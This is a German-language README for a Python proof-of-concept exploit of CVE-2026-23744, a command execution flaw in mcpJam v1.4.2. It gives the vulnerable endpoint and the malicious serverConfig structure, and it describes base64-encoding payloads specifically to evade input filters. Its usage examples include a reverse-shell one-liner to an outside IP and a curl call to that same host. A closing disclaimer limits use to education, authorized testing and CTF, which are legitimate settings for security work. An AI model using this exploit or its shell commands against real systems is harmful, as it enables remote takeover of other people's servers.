
cve-2026-23744 python Exploit
Ein Proof-of-Concept-Exploit in Python 3 für CVE-2026-23744, eine Schwachstelle zur Ausführung beliebiger Befehle, die mcpJam v1.4.2 betrifft.
Diese Anwendung automatisiert die Zustellung von Payloads, indem sie Befehle vor der Übertragung transparent Base64-codiert und so dabei hilft, restriktive Eingabevalidierungen und Zeichenfiltermechanismen zu umgehen. Die Payload wird auf dem Zielsystem über einen /bin/bash-Wrapper dekodiert und ausgeführt.
Befehle werden vor der Übertragung automatisch codiert, was die Zuverlässigkeit erhöht, wenn Anwendungen angegriffen werden, die strenge Eingabevalidierungen oder Zeichenbeschränkungen durchsetzen.
Unterstützt die Ausführung beliebiger Befehle, einschließlich:
sh, bash, nc, usw.)Zeigt:
Dies vereinfacht die Fehlersuche und die Validierung des Exploits.
Unterdrückt Warnungen zur Zertifikatsprüfung und ermöglicht so die Interaktion mit Zielen, die selbstsignierte oder anderweitig nicht vertrauenswürdige SSL-Zertifikate verwenden.
Installieren Sie die erforderliche Abhängigkeit:
pip install requests
python3 exploit.py <target_url> "<command>"
python3 exploit.py http://devhub.com:6274 "curl http://10.10.14.70:8888"
python3 exploit.py http://devhub.com:6274 "sh -i >& /dev/tcp/10.10.14.70/4444 0>&1"
Der Exploit zielt auf den Endpunkt /api/mcp/connect, indem ein bösartiges serverConfig-Objekt erstellt wird.
Anstatt Befehle direkt zu übertragen, wird die Payload in eine Base64-codierte Zeichenfolge umgewandelt und über Bash ausgeführt:
"args": [
"-c",
f"echo {base64_payload} | base64 -d | bash"
]
Dieser Ansatz hilft, Filterung auf Anwendungsebene zu umgehen und stellt sicher, dass die Payload vollständig auf dem Zielsystem dekodiert und ausgeführt wird.
serverConfig-Anfrage eingebettet.base64 -d./bin/bash weitergeleitet.[!WARNING] Dieses Projekt dient ausschließlich zu Bildungszwecken, für autorisierte Sicherheitsbewertungen und Capture-The-Flag-Umgebungen (CTF).
Die unbefugte Verwendung gegen Systeme, für die Sie keine ausdrückliche Genehmigung haben, ist illegal und unethisch. Der Autor übernimmt keine Verantwortung für Missbrauch, Schäden oder rechtliche Konsequenzen, die aus der Verwendung dieser Software entstehen.